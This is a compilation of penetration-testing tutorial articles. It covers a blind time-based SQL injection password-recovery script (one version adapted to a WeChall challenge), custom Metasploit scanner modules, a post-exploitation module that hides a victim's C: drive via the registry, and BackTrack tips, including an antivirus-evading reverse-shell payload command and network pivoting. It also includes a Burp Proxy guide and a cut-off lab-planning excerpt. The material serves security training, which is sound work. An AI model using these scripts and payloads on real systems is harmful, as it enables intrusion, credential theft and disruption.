We then set the length of time the server took to respond as the firstresponsetime parameter. We will use this to understand how many characters we need to brute-force through this method in the following chain:

firstresponsetime = int(req.elapsed.total_seconds())

We create a loop which will set x to be all numbers from 1 to the length of the string identified and perform an action for each one. We start from 1 here because MySQL starts counting from 1 rather than from zero like Python:

for x in range(1, firstresponsetime + 1):

We make a similar payload as before, but this time we are saying sleep for the ascii value of the xth character of the password in the password column, row one. So if the first character was a lowercase a, then the corresponding ascii value is 97 and therefore the system would sleep for 97 seconds; if it was a lowercase b, it would sleep for 98 seconds, and so on:

payload = {'injection': '\'or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}

We submit our data each time for each character place in the string:

req = requests.post('<target url>', data=payload, cookies=cookies)

We take the response time from each request to record how long the server sleeps and then convert that time back from an ascii value into a letter:

responsetime = int(round(req.elapsed.total_seconds()))
a = chr(responsetime)

For each iteration, we rebuild the answer string as it is currently known, and eventually print out the full recovered password:

answer = ''.join(times)
print "Recovered String: " + answer

There's more…

This script provides a framework that can be adapted to many different scenarios. Wechall, the web app challenge website, sets a time-limited, blind SQLi challenge that has to be completed in a very short time period. The following is our original script adapted to this environment.
As you can see, I've had to account for smaller time differences in differing values, server lag and also incorporated a checking method to reset the testing value each time and submit it automatically: import subprocess import requests   def round_down(num, divisor):    return num - (num%divisor)   subprocess.Popen(["modprobe pcspkr"], shell=True) subprocess.Popen(["beep"], shell=True)     values = {'0': '0', '25': '1', '50': '2', '75': '3', '100': '4', '125': '5', '150': '6', '175': '7', '200': '8', '225': '9', '250': 'A', '275': 'B', '300': 'C', '325': 'D', '350': 'E', '375': 'F'} times = [] answer = "This is the first time" cookies = {'wc': 'cookie'} setup = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?mo=WeChall&me=Sidebar2&rightpanel=0', cookies=cookies) y=0 accum=0   while 1: reset = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?reset=me', cookies=cookies) for line in reset.text.splitlines():    if "last hash" in line:      print "the old hash was:"+line.split("      ")[20].strip(".</li>")      print "the guessed hash:"+answer      print "Attempts reset n n"    for x in range(1, 33):      payload = {'injection': ''or IF (ord(substr(password,      '+str(x)+', 1)) BETWEEN 48 AND      57,sleep((ord(substr(password, '+str(x)+', 1))-      48)/4),sleep((ord(substr(password, '+str(x)+', 1))-      55)/4));#', 'inject': 'Inject'}      req = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php?ajax=1', data=payload, cookies=cookies)      responsetime = str(req.elapsed)[5]+str(req.elapsed)[6]+str(req.elapsed) [8]+str(req.elapsed)[9]      accum = accum + int(responsetime)      benchmark = int(15)      benchmarked = int(responsetime) - benchmark      rounded = str(round_down(benchmarked, 25))      if rounded in values:        a = str(values[rounded])        times.append(a)        answer = ''.join(times)      else:        print rounded        rounded = str("375")        a = str(values[rounded])        times.append(a)        answer = ''.join(times) submission = {'thehash': str(answer), 'mybutton': 'Enter'} submit = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php', data=submission, cookies=cookies) print "Attempt: "+str(y) print "Time taken: "+str(accum) y += 1 for line in submit.text.splitlines():    if "slow" in line:      print line.strip("<li>")    elif "wrong" in line:       print line.strip("<li>") if "wrong" not in submit.text:    print "possible success!"    #subprocess.Popen(["beep"], shell=True) Summary We looked at how to attack strings through different penetration attacks via Boolean SQLi and Blind SQL Injection. You will find some various kinds of attacks present in the book throughout. Resources for Article: Further resources on this subject: Pentesting Using Python [article] Wireless and Mobile Hacks [article] Introduction to the Nmap Scripting Engine [article]
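As a final aside to these recipes, the article's introduction mentions timing normal actions to normalize attack times. The following short sketch is not part of the original recipes; it is an illustrative helper, with '<target url>' as a placeholder exactly as in the scripts above, that measures a baseline of ordinary response times so that a delay caused by an injected sleep() can be separated from normal server lag.

# Illustrative helper: measure baseline response times so that
# sleep()-based delays can be told apart from ordinary server lag.
import requests

def baseline(url, samples=10):
    timings = []
    for _ in range(samples):
        r = requests.get(url)
        timings.append(r.elapsed.total_seconds())
    timings.sort()
    return {
        "min": timings[0],
        "max": timings[-1],
        "median": timings[len(timings) // 2],
    }

if __name__ == "__main__":
    stats = baseline("<target url>")
    print("Baseline timings: " + str(stats))
    # Any response that takes noticeably longer than stats["max"]
    # is a candidate for an injected sleep() delay.

Subtracting the measured baseline from each timed response, as the adapted Wechall script does with its benchmark value, makes the character recovery far less sensitive to network jitter.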

article-image-metasploit-custom-modules-and-meterpreter-scripting
Packt
03 Jun 2014
10 min read
Save for later

Metasploit Custom Modules and Meterpreter Scripting

Packt
03 Jun 2014
10 min read
(For more resources related to this topic, see here.) Writing out a custom FTP scanner module Let's try and build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module: require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Apex FTP Detector', 'Description' => '1.0', 'Author' => 'Nipun Jaswal', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(21), ], self.class) End We start our code by defining the required libraries to refer to. We define the statement require 'msf/core' to include the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. However, the ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on. Next, we define the information of the module we are writing and attributes such as name, description, author name, and license in the initialize method. We also define what options are required for the module to work. For example, here we assign RPORT to port 21 by default. Let's continue with the remaining part of the module: def run_host(target_host) connect(true, false) if(banner) print_status("#{rhost} is running #{banner}") end disconnect end end We define the run_host method, which will initiate the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters into the connect function, which are true and false. The true parameter defines the use of global parameters, whereas false turns off the verbose capabilities of the module. The beauty of the connect function lies in its operation of connecting to the target and recording the banner of the FTP service in the parameter named banner automatically, as shown in the following screenshot: Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end and we disconnect the connection to the target. This was an easy module, and I recommend that you should try building simple scanners and other modules like these. Nevertheless, before we run this module, let's check whether the module we just built is correct with regards to its syntax or not. We can do this by passing the module from an in-built Metasploit tool named msftidy as shown in the following screenshot: We will get a warning message indicating that there are a few extra spaces at the end of line number 19. Therefore, when we remove the extra spaces and rerun msftidy, we will see that no error is generated. This marks the syntax of the module to be correct. 
Now, let's run this module and see what we gather: We can see that the module ran successfully, and it has the banner of the service running on port 21, which is Baby FTP Server. For further reading on the acceptance of modules in the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements. Writing out a custom HTTP server scanner Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb as shown in the following code snippet: require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Server Service Detector', 'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information', 'Author' => 'Nipun_Jaswal', 'License' => MSF_LICENSE ) end We include all the necessary library files as we did for the previous modules. We also assign general information about the module in the initialize method, as shown in the following code snippet: def os_fingerprint(response) if not response.headers.has_key?('Server') return "Unknown OS (No Server Header)" end case response.headers['Server'] when /Win32/, /(Windows/, /IIS/ os = "Windows" when /Apache// os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end return os end def pb_fingerprint(response) if not response.headers.has_key?('X-Powered-By') resp = "No-Response" else resp = response.headers['X-Powered-By'] end return resp end def run_host(ip) connect res = send_request_raw({'uri' => '/', 'method' => 'GET' }) return if not res os_info=os_fingerprint(res) pb=pb_fingerprint(res) fp = http_fingerprint(res) print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On #{os_info}") end end The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host. Next, we have send_request_raw, which will fetch the response from the website or web server at / with a GET request. The result fetched will be stored into the variable named res. We pass the value of the response in res to the os_fingerprint method. This method will check whether the response has the Server key in the header of the response; if the Server key is not present, we will be presented with a message saying Unknown OS. However, if the response header has the Server key, we match it with a variety of values using regex expressions. If a match is made, the corresponding value of os is sent back to the calling definition, which is the os_info parameter. Now, we will check which technology is running on the server. We will create a similar function, pb_fingerprint, but will look for the X-Powered-By key rather than Server. Similarly, we will check whether this key is present in the response code or not. If the key is not present, the method will return No-Response; if it is present, the value of X-Powered-By is returned to the calling method and gets stored in a variable, pb. Next, we use the http_fingerprint method that we used in the previous examples as well and store its result in a variable, fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables. 
Let's see what output we'll get after running this module: Msf auxiliary(http_myscan) > run [*]192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Writing out post-exploitation modules Now, as we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target compromises successfully. So, let's begin with a simple drive disabler module which will disable C: at the target system: require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry def initialize super( 'Name' => 'Drive Disabler Module', 'Description' => 'C Drive Disabler Module', 'License' => MSF_LICENSE, 'Author' => 'Nipun Jaswal' ) End We started in the same way as we did in the previous modules. We have added the path to all the required libraries we need in this post-exploitation module. However, we have added include Msf::Post::Windows::Registry on the 5th line of the preceding code, which refers to the /core/post/windows/registry.rb file. This will give us the power to use registry manipulation functions with ease using Ruby mixins. Next, we define the type of module and the intended version of Metasploit. In this case, it is Post for post-exploitation and Metasploit3 is the intended version. We include the same file again because this is a single file and not a separate directory. Next, we define necessary information about the module in the initialize method just as we did for the previous modules. Let's see the remaining part of the module: def run key1="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\" print_line("Disabling C Drive") meterpreter_registry_setvaldata(key1,'NoDrives','4','REG_DWORD') print_line("Setting No Drives For C") meterpreter_registry_setvaldata(key1,'NoViewOnDrives','4','REG_DWORD') print_line("Removing View On The Drive") print_line("Disabled C Drive") end end #class We created a variable called key1, and we stored the path of the registry where we need to create values to disable the drives in it. As we are in a meterpreter shell after the exploitation has taken place, we will use the meterpreter_registry_setval function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1. This operation will create a new registry key named NoDrives of the REG_DWORD type at the path defined by key1. However, you might be wondering why we have supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula, 2^([drive character serial number]-1) . Suppose, we need to disable the C drive. We know that character C is the third character in alphabets. Therefore, we can calculate the exact bitmask value for disabling the C drive as follows: 2^ (3-1) = 2^2= 4 Therefore, the bitmask is 4 for disabling C:. We also created another key, NoViewOnDrives, to disable the view of these drives with the exact same parameters. Now, when we run this module, it gives the following output: So, let's see whether we have successfully disabled C: or not: Bingo! No C:. We successfully disabled C: from the user's view. Therefore, we can create as many post-exploitation modules as we want according to our need. I recommend you put some extra time toward the libraries of Metasploit. 
Make sure you have user-level access rather than SYSTEM for the preceding script to work, as SYSTEM privileges will not create the registry under HKCU. In addition to this, we have used HKCU instead of writing HKEY_CURRENT_USER, because of the inbuilt normalization that will automatically create the full form of the key. I recommend you check the registry.rb file to see the various available methods.
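The bitmask arithmetic used for the NoDrives and NoViewOnDrives values is easy to get wrong by hand. The following small Python sketch is not part of the module; it simply applies the 2^(drive position - 1) formula from the explanation above to one or more drive letters, so you can verify the value before hardcoding it into your own post-exploitation module.

# Illustrative sketch: compute the NoDrives/NoViewOnDrives bitmask
# using the 2^(drive position - 1) formula described above.
import string

def drive_bitmask(letters):
    mask = 0
    for letter in letters:
        position = string.ascii_uppercase.index(letter.upper()) + 1  # A=1, B=2, C=3...
        mask |= 2 ** (position - 1)
    return mask

if __name__ == "__main__":
    print("C only: " + str(drive_bitmask("C")))        # 4, as used in the module
    print("A, C and D: " + str(drive_bitmask("ACD")))  # 1 + 4 + 8 = 13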

article-image-tips-and-tricks-backtrack-4
Packt
26 May 2011
7 min read
Save for later

Tips and Tricks on BackTrack 4

Packt
26 May 2011
7 min read
  BackTrack 4: Assuring Security by Penetration Testing Master the art of penetration testing with BackTrack         Read more about this book       (For more resources on this subject, see here.) Updating the kernel The update process is enough for updating the software applications. However, sometimes you may want to update your kernel, because your existing kernel doesn't support your new device. Please remember that because the kernel is the heart of the operating system, failure to upgrade may cause your BackTrack to be unbootable. You need to make a backup of your kernel and configuration. You should ONLY update your kernel with the one made available by the BackTrack developers. This Linux kernel is modified to make certain "features" available to the BackTrack users and updating with other kernel versions could disable those features.   Multiple Customized installations One of the drawbacks we found while using BackTrack 4 is that you need to perform a big upgrade (300MB to download) after you've installed it from the ISO or from the VMWare image provided. If you have one machine and a high speed Internet connection, there's nothing much to worry about. However, imagine installing BackTrack 4 in several machines, in several locations, with a slow internet connection. The solution to this problem is by creating an ISO image with all the upgrades already installed. If you want to install BackTrack 4, you can just install it from the newly created ISO image. You won't have to download the big upgrade again. While for the VMWare image, you can solve the problem by doing the upgrade in the virtual image, then copying that updated virtual image to be used in the new VMWare installation.   Efficient methodology Combining the power of both methodologies, Open Source Security Testing Methodology Manual (OSSTMM) and Information Systems Security Assessment Framework (ISSAF) does provide sufficient knowledge base to assess the security of an enterprise environment efficiently.   Can't find the dnsmap program In our testing, the dnsmap-bulk script is not working because it can't find the dnsmap program. To fix it, you need to define the location of the dnsmap executable. Make sure you are in the dnsmap directory (/pentest/enumeration/dns/dnsmap). Edit the dnsmap-bulk.sh file using nano text editor and change the following: dnsmap $i elif [[ $# -eq 2 ]] then dnsmap $i -r $2 to ./dnsmap $i elif [[ $# -eq 2 ]] then ./dnsmap $i -r $2 and save your changes.   fierce Version Currently, the fierce Version 1 included with BackTrack 4 is no longer maintained by the author (Rsnake). He has suggested using fierce Version 2 that is still actively maintained by Jabra. fierce Version 2 is a rewrite of fierce Version 1. It also has several new features such as virtual host detection, subdomain and extension bruteforcing, template based output system, and XML support to integrate with Nmap. Since fierce Version 2 is not released yet and there is no BackTrack package for it, you need to get it from the development server by issuing the Subversion check out command: #svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/fierce2/ Make sure you are in the /pentest/enumeration directory first before issuing the above command. You may need to install several Perl modules before you can use fierce v2 correctly.   
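If you prefer not to patch the dnsmap-bulk.sh shell script described earlier, the same bulk behaviour can be reproduced from Python. The sketch below is purely illustrative and is not shipped with BackTrack: it assumes you run it from the dnsmap directory (/pentest/enumeration/dns/dnsmap), that ./dnsmap takes a target domain as its first argument, and that -r writes results to the given file, mirroring the patched script.

# Illustrative bulk wrapper around dnsmap, mirroring dnsmap-bulk.sh.
# Run it from the dnsmap directory; domains.txt holds one domain per line.
import subprocess
import sys

def bulk_dnsmap(domain_file, results_file=None):
    with open(domain_file) as handle:
        domains = [line.strip() for line in handle if line.strip()]
    for domain in domains:
        cmd = ["./dnsmap", domain]
        if results_file:
            cmd += ["-r", results_file]   # -r stores results in a file, as in the fixed script
        print("[*] Enumerating " + domain)
        subprocess.call(cmd)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("Usage: python bulk_dnsmap.py domains.txt [results.txt]")
    bulk_dnsmap(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None)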
Relationship between "Vulnerability" and "Exploit" A vulnerability is a security weakness found in the system which can be used by the attacker to perform unauthorized operations, while the exploit is a piece of code (proof-of-concept or PoC) written to take advantage of that vulnerability or bug in an automated fashion.   CISCO Privilege modes There are 16 different privilege modes available for the Cisco devices, ranging from 0 (most restricted level) to 15 (least restricted level). All the accounts created should have been configured to work under the specific privilege level. More information on this is available at http://www.cisco.com/en/US/docs/ios/12_2t/12_2t13/feature/guide/ftprienh.html.   Cisco Passwd Scanner The Cisco Passwd Scanner has been developed to scan the whole bunch of IP addresses in a specific network class. This class can be represented as A, B, or C in terms of network computing. Each class has it own definition for a number of hosts to be scanned. The tool is much faster and efficient in handling multiple threads in a single instance. It discovers those Cisco devices carrying default telnet password "cisco". We have found a number of Cisco devices vulnerable to default telnet password "cisco".   Common User Passwords Profiler (CUPP) As a professional penetration tester you may find a situation where you hold the target's personal information but are unable to retrieve or socially engineer his e-mail account credentials due to certain variable conditions, such as, the target does not use the Internet often, doesn't like to talk to strangers on the phone, and may be too paranoid to open unknown e-mails. This all comes to guessing and breaking the password based on various password cracking techniques (dictionary or brute force method). CUPP is purely designed to generate a list of common passwords by profiling the target name, birthday, nickname, family member's information, pet name, company, lifestyle patterns, likes, dislikes, interests, passions, and hobbies. This activity serves as crucial input to the dictionary-based attack method while attempting to crack the target's e-mail account password.   Extract particular information from the exploits list Using the power of bash commands we can manipulate the output of any text file in order to retrieve meaningful data. This can be accomplished by typing in cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv. To learn the basic shell commands please refer to an online source at: http://tldp.org/LDP/abs/html/index.html.   "inline" and "stager" type payload An inline payload is a single self-contained shell code that is to be executed with one instance of an exploit. While the stager payload creates a communication channel between the attacker and victim machine to read-off the rest of the staging shell code to perform the specific task, it is often common practice to choose stager payloads because they are much smaller in size than inline payloads.   Extending attack landscape by gaining deeper access to the target's network that is inaccessible from outside Metasploit provides a capability to view and add new routes to the destination network using the "route add targetSubnet targetSubnetMask SessionId" command (for example, route add 10.2.4.0 255.255.255.0 1). The "SessionId" is pointing to the existing meterpreter session (also called gateway) created after successful exploitation. 
The "targetSubnet" is another network address (also called dual homed Ethernet IP-address) attached to our compromised host. Once you set a metasploit to route all the traffic through a compromised host session, we are then ready to penetrate further into a network which is normally non-routable from our side. This terminology is commonly known as Pivoting or Foot-holding.   Evading Antivirus Protection Using Metasploit Using a tool called msfencode located at /pentest/exploits/framework3, we can generate a self-protected executable file with encoded payload. This should be parallel to the msfpayload file generation process. A "raw" output from Msfpayload will be piped into Msfencode to use specific encoding technique before outputting the final binary. For instance, execute ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.3 LPORT=32323 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/tictoe.exe to generate an encoded version of a reverse shell executable file. We strongly suggest you to use the "stager" type payloads instead of "inline" payloads, as they have a greater probability of success in bypassing major malware defenses due to their indefinite code signatures.   Stunnel version 3 BackTrack also comes with Stunnel version 3. The difference with Stunnel version 4 is that the version 4 uses a configuration file. If you want to run the version 3 style command-line arguments, you can call the command stunnel or stunnel3 with all of the needed arguments. Summary In this article we will take a look at some tips and tricks to make the best use of BackTrack OS. Further resources on this subject: FAQs on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]
Packt
03 Sep 2013
11 min read
Save for later

Quick start – Using Burp Proxy

Packt
03 Sep 2013
11 min read
(For more resources related to this topic, see here.) At the top of Burp Proxy, you will notice the following three tabs: intercept: HTTP requests and responses that are in transit can be inspected and modified from this window options: Proxy configurations and advanced preferences can be tuned from this window history: All intercepted traffic can be quickly analyzed from this window If you are not familiar with the HTTP protocol or you want to refresh your knowledge, HTTP Made Really Easy, A Practical Guide to Writing Clients and Servers, found at http://www.jmarshall.com/easy/http/, represents a compact reference. Step 1 – Intercepting web requests After firing up Burp and configuring the browser, let's intercept our first HTTP request. During this exercise, we will intercept a simple request to the publisher's website: In the intercept tab, make sure that Burp Proxy is properly stopping all requests in transit by checking the intercept button. This should be marked as intercept is on. In the browser, type http://www.packtpub.com/ in the URL bar and press Enter. Back in Burp Proxy, you should be able to see the HTTP request made by the browser. At this stage, the request is temporarily stopped in Burp Proxy waiting for the user to either forward or stop it. For instance, press forward and return to the browser. You should see the home page of Packt Publishing as you would normally interact with the website. Again, type http://www.packtpub.com/ in the URL bar and press Enter. Let's press drop this time. Back in the browser, the page will contain the warning Burp proxy error: message was dropped by user. We have dropped the request, thus Burp Proxy did not forward the request to the server. As a result, the browser received a temporary HTML page with the warning message generated by Burp, instead of the original HTML content. Let's try one more time. Type http://www.packtpub.com/ in the URL bar of the browser and press Enter. Once the request is properly captured by Burp Proxy, the action button becomes active. Click on it to display the contextual menu. This is an important functionality as it allows you to import the current web request in any of the other Burp tools. You can already imagine the potentialities of having a set of integrated tools that allow you to manipulate and analyze web requests so easily. For example, if we want to decode the request, we can simply click on send to decoder. Burp Proxy In Burp Proxy, we can also decide to automatically forward all requests without waiting for the user to either forward or drop the communication. By clicking on the intercept button, it is possible to switch from intercept is on to intercept is off. Nevertheless, the proxy will record all requests in transit. Also, Burp Proxy allows you to automatically intercept all responses matching specific characteristics. Take a look at the numerous options available in the intercept server response section from within the Burp Proxy options tab. For example, it is possible to intercept the server's response only if the client's request was intercepted. This is extremely helpful while testing input validation vulnerabilities as we are generally interested in evaluating the server's responses for all tampered requests. Or else, you may only want to intercept and inspect responses having a specific return code (for example, 200 OK). 
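Intercepting browser traffic is only half of the picture: you can also push scripted traffic through the same listener and watch it appear in the intercept and history tabs. The snippet below is an illustrative sketch and not part of Burp itself; it assumes Burp's proxy listener is running on 127.0.0.1:8080 (its usual default) and uses the Python requests library to send a request to the publisher's website through it.

# Illustrative sketch: route a scripted request through Burp Proxy so it
# shows up in the intercept/history tabs. Assumes the listener is on
# 127.0.0.1:8080, which is Burp's usual default.
import requests

burp = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

# verify=False because Burp re-signs HTTPS traffic with its own CA
# certificate, which Python will not trust out of the box.
response = requests.get("http://www.packtpub.com/", proxies=burp, verify=False)
print("Status: " + str(response.status_code))
print("First bytes: " + response.text[:80])

With intercept set to on, this request will sit in the intercept tab waiting to be forwarded or dropped, exactly like a request issued from the browser.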
Step 2 – Inspecting web requests Once a request is properly intercepted, it is possible to inspect the entire content, headers, and parameters, using one of the four Burp Proxy message analysis tabs: raw: This view allows you to display the web request in raw format within a simple text editor. This is a very handy visualization as it enables maximum flexibility for further changing the content. params: In this view, the focus is on user-supplied parameters (GET/POST parameters, cookies). This is particularly important in case of complex requests as it allows to consider all entry points for potential vulnerabilities. Whenever applicable, Burp Proxy will also automatically perform URL decoding. In addition, Burp Proxy will attempt to parse commonly used formats, including JSON. headers: Similarly, this view displays the HTTP header names and values in tabular form. hex: In case of binary content, it is useful to inspect the hexadecimal representation of the resource. This view allows to display a request as in a traditional hex editor. The history tab enables you to analyze all web requests transited through the proxy: Click on the history tab. At the top, Burp Proxy shows all the requests in the bundle. At the bottom, it displays the content of the request and response corresponding to the specific selection. If you have previously modified the request, Burp Proxy history will also display the modified version. Displaying HTTP requests and responses intercepted by Burp Proxy By double-clicking on one of the requests, Burp will automatically open a new window with the specific content. From this window, it is possible to browse all the captured communication using the previous and next buttons Back in the history tab, Burp Proxy displays several details for each item including the request method, URL, response's code, and length. Each request is uniquely identified by a number, visible in the left-hand side column. Click on the request identifier. Burp Proxy allows you to set a color for that specific item. This is extremely helpful to highlight important requests or responses. For example, during the initial application enumeration, you may notice an interesting request; you can mark it and get back later for further testing. Burp Proxy history is also useful when you have to evaluate a sequence of requests in order to reproduce a specific application behavior. Click on the display filter, at the top of the history list to hide irrelevant content. If you want to analyze all HTTP requests containing at least one parameter, select the show only parameterised checkbox. If you want to display requests having a specific response, just select the appropriate response code in the filter by status code selection. At this point, you may have already understood the potentialities of the tool to filter and reveal interesting traffic. In addition, when using Burp Suite Professional, you can also use the filter by search term option. This feature is particularly important when you need to analyze hundreds of requests or responses as you can filter relevant traffic only by using regular expressions or simply matching particular strings. Using this feature, you may also be able to discover sensitive information (for example, credentials) embedded in the intercepted pages. Step 3 – Tampering web requests As part of a typical security assessment, you will need to modify HTTP requests and analyze the web application responses. 
For example, to identify SQL injection vulnerabilities, it is important to inject common attack vectors (for example, a single quote) in all user-supplied input, including HTTP headers, cookies, and GET/POST parameters. If you want to refresh your knowledge on common web application vulnerabilities, the OWASP Top Ten Project article at https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project is a good starting point.

Tampering web requests with Burp is as easy as editing strings in a text editor:

Intercept a request containing at least one HTTP parameter. For example, you can point your browser to http://www.packtpub.com/books/all?keys=ASP.
Go to Burp Proxy | Intercept. At this point, you should see the corresponding HTTP request.
From the raw view, you can simply edit any aspect of the web request in transit. For example, you can change the value of the GET parameter keys from ASP to PHP. Edit the request to look like the following:

GET /books/all?keys=PHP HTTP/1.1
Host: www.packtpub.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive

Click on forward and get back to the browser. This should result in a search query performed with the string PHP. You can verify it by simply checking the results in the HTML page.

Although we have used the raw view to change the previous HTTP request, it is actually possible to use any of the Burp Proxy views. For example, in the params view, it is possible to add a new parameter by following these steps:

Clicking on new (right side), from the Burp Proxy params view.
Selecting the proper parameter type (URL, body, or cookie). URL should be used for GET parameters, whereas body denotes POST parameters.
Typing the name and the value of the newly created parameter.

Advanced features

After practicing with the basic features provided by Burp Proxy, you are almost ready to experiment with more advanced configurations.

Match and replace

Let's imagine that you are testing an application designed for mobile devices using a standard browser from your computer. In most cases, the web server examines the user-agent provided by the browser to identify the specific platform and respond with customized resources that better fit mobile phones and tablets. Under these circumstances, you will find the match and replace function, provided by Burp Proxy, particularly useful. Let's configure Burp Proxy in order to tamper with the user-agent HTTP header field:

In the options tab of Burp Proxy, scroll down to the match and replace section. Under the match and replace table, a drop-down list and two text fields allow you to create a customized rule.
Select request header from the drop-down list, since we want to create a match condition pertaining to HTTP requests.
Type ^User-Agent.*$ in the first text field. This field represents the match within the HTTP request. Burp Proxy's match and replace feature allows you to use simple strings as well as complex regular expressions. If you are not familiar with regular expressions, have a look at http://www.regular-expressions.info/quickstart.html.
In the second text field, type Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/4h20+ (KHTML, like Gecko) Version/3.0 Mobile/1C25 Safari/419.3 or any other fake user-agent that you want to impersonate.
Click add and verify that the new match has been added to the list; this button is shown here: Burp Proxy match and replace list Intercept a request, leave it to pass through the proxy, and verify that it has been automatically modified by the tool. Automatically modified HTTP header in Burp Proxy HTML modification Another interesting feature of Burp Proxy is the automatic HTML modification, that can be activated and configured in the appropriate section within Burp Proxy | options. By using this function, you can automatically remove JavaScript or modify HTML forms of all received HTTP responses. Some applications deploy client-side validation in the form of disabled HTML form fields or JavaScript code. If you want to verify the presence of server-side controls that enforce specific data formats, you would need to tamper the request with invalid data. In these situations, you can either manually tamper the request in the proxy or enable HTML modification to remove any client-side validation and use the browser in order to submit invalid data. This function can be also used to display hidden form fields. Let's see in practice how you can activate this feature: In Burp Proxy, go to options, scroll down to the HTML modification section. Numerous options are available in this section: unhide hidden form fields to display hidden HTML form fields, enable disabled form fields to submit all input forms present inside the HTML page, remove input field length limits to allow extra-long strings in the text fields, remove JavaScript form validation to make Burp Proxy all onsubmit handler JavaScript functions from HTML forms, remove all JavaScript to completely remove all JS scripts and remove object tags to remove embedded objects within the HTML document. Select the desired checkboxes to activate automatic HTML modification. Summary Using this feature, you will be able to understand whether the web application enforces server- side validation. For instance, some insecure applications use client-side validation only (for example, via JavaScript functions). You can activate the automatic HTML modification feature by selecting the remove JavaScript form validation checkbox in order to perform input validation testing directly from your browser. Resources for Article : Further resources on this subject: Visual Studio 2010 Test Types [Article] Ordered and Generic Tests in Visual Studio 2010 [Article] Manual, Generic, and Ordered Tests using Visual Studio 2008 [Article]  
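If you want to double-check what the match and replace rule is doing, you can reproduce the same header change from a script and compare the responses. This short sketch is illustrative only and is not part of Burp: it sends the mobile user-agent string quoted above directly with the Python requests library, so you can contrast the HTML returned for a spoofed mobile client with what your desktop browser normally receives.

# Illustrative sketch: send the spoofed mobile User-Agent from the
# match and replace example directly, without going through Burp.
import requests

mobile_ua = ("Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) "
             "AppleWebKit/4h20+ (KHTML, like Gecko) Version/3.0 "
             "Mobile/1C25 Safari/419.3")

response = requests.get("http://www.packtpub.com/",
                        headers={"User-Agent": mobile_ua})
print("Status: " + str(response.status_code))
print("Response length: " + str(len(response.text)))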

article-image-planning-lab-environment
Packt
12 Apr 2013
10 min read
Save for later

Planning the lab environment

Packt
12 Apr 2013
10 min read
(For more resources related to this topic, see here.) Getting ready To get the best result after setting up your lab, you should plan it properly at first. Your lab will be used to practise certain penetration testing skills. Therefore, in order to properly plan your lab environment, you should first consider which skills you want to practise. Although you could also have non-common or even unique reasons to build a lab, I can provide you with the average list of skills one might need to practice: Essential skills Discovery techniques Enumeration techniques Scanning techniques Network vulnerability exploitation Privilege escalation OWASP TOP 10 vulnerabilities discovery and exploitation Password and hash attacks Wireless attacks Additional skills Modifying and testing exploits Tunneling Fuzzing Vulnerability research Documenting the penetration testing process All these skills are applied in real-life penetration testing projects, depending on its depth and the penetration tester's qualifications. The following skills could be practised at three lab types or their combinations: Network security lab Web application lab Wi-Fi lab I should mention that the lab planning process for each of the three lab types listed consists of the same four phases: Determining the lab environment requirements: This phase helps you to actually understand what your lab should include. In this phase, all the necessary lab environment components should be listed and their importance for practising different penetration testing skills should 